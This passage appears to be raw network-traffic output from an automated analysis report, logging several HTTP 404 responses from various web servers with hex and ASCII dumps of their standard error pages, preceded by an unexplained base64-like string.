40G=SUzGnuvHqjrdwPgpBezZGbhCwYMdh+XwJkMZg9n4Ifyo597CK6Ed8gNoRA7ph56OLxFHC7tcF6fGAys7gSswWOvAIA47kxuFpRtdjue0WtaRSjso6UeSWKFsfHjYYl2YeojxwNITV07PNOrc9OsZyYjmENLrwyc308tRMKbxoH7F6ZFRBdD0HkEFRIQKHRfQkkBtpJoTUQOb1KVo/Q==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:33:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cachecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tnN8hr0%2FBQqIPo6hD80GwDcALItVRelnd%2BRNcuU7ctHzH2kdglvujoYJeB9uTs2UcHHxPYOBf%2FAVW2%2FmlCUy%2FEuRGtGFZgd1qg723BMvMhD%2F6UL%2B5FRiEyow4JgFwpP9NnUAQhGS2yRw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9003902918867293-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1957&min_rtt=1957&rtt_var=978&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=550&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:34:03 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:34:06 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:34:08 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:34:11 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 11 Jan 2025 08:35:17 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2025-01-11T08:35:22.2947743Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 08:35:23 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 08:35:25 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 